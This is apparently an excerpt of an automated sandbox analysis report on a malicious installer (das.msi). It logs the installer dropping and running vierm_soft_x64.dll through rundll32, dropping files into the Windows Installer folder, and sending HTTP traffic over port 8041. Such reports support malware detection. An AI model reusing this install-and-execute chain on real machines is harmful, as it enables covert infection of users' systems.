                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023FB06_2_0000000180023FB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021FB46_2_0000000180021FB4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024FC46_2_0000000180024FC4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EFC86_2_000000018001EFC8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000016AD27929EE6_2_0000016AD27929EE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000016AD27931BE6_2_0000016AD27931BE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F807BE6_2_0000000273F807BE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F7FFEE6_2_0000000273F7FFEE
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F302E09_2_00F302E0
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F302A89_2_00F302A8
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F21A8C9_2_00F21A8C
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F21A7C9_2_00F21A7C
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F303E89_2_00F303E8
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F303C89_2_00F303C8
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F301A09_2_00F301A0
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F221649_2_00F22164
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F303289_2_00F30328
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll 97A6331239D451D7DFE15BFE17DE8B419DF741AE68BACD440808F8B8D3F99B8A
                  Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018004816C appears 44 times
                  Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180001400 appears 56 times
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: String function: 00F53292 appears 70 times
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: String function: 00F53790 appears 39 times
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: String function: 00F5325F appears 103 times
                  Source: das.msiBinary or memory string: OriginalFilenameviewer.exeF vs das.msi
                  Source: das.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs das.msi
                  Source: classification engineClassification label: mal100.troj.evad.winMSI@9/24@7/3
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F33860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,4_2_00F33860
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F34BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,4_2_00F34BA0
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F345B0 LoadResource,LockResource,SizeofResource,4_2_00F345B0
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML9FF5.tmpJump to behavior
                  Source: C:\Windows\System32\rundll32.exeMutant created: NULL
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF5DC67D3219BCB6E9.TMPJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\das.msi"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312E
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIA029.tmp "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 042055341D46BDE43A4D1CB4423C312EJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIA029.tmp "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: das.msiStatic file information: File size 1669120 > 1048576
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp, vierm_soft_x64.dll.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: vierm_soft_x64.dll.2.drStatic PE information: real checksum: 0x81152 should be: 0xbc113
                  Source: vierm_soft_x64.dll.2.drStatic PE information: section name: memcpy_
                  Source: vierm_soft_x64.dll.2.drStatic PE information: section name: _RDATA
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F5323C push ecx; ret 4_2_00F5324F
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_0000016AD27A00D8 push cs; retf 6_3_0000016AD27A00FD
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2EE21 push rsi; ret 9_2_00F2EE27
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2F5BA push rcx; ret 9_2_00F2F5BC
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2EF4F push D5912897h; iretq 9_2_00F2EF57

                  Persistence and Installation Behavior

                  barindex
                  Drops executables to the windows directory (C:\Windows) and starts them
                  Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIA029.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F0E.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EBE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EEE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9E30.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA029.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\vierm_soft_x64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F0E.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EBE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EEE.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9E30.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA029.tmpJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49701
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49702
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 63796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57452
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57453
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57455
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57456
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 57456
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62209
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62212
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62216
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62218
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62219
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62222
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62223
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62226
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62228
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62229
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62233
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62234
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62236
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62237
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62239
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62240
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62242
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62243
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62245
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62246
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62249
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62250
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62253
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62254
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62260
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62262
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62268
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62285
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62287
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62292
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62292
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62292
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62298
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62299
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62302
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62303
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62309
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62311
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62316
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62317
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62322
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62324
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62327
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62328
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62333
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62335
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62342
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62343
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62361
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62367
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62369
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62374
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62376
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62382
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62384
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62388
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62390
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62397
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62398
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62403
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62405
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62411
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62413
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62418
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 62419
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,9_2_00F27274
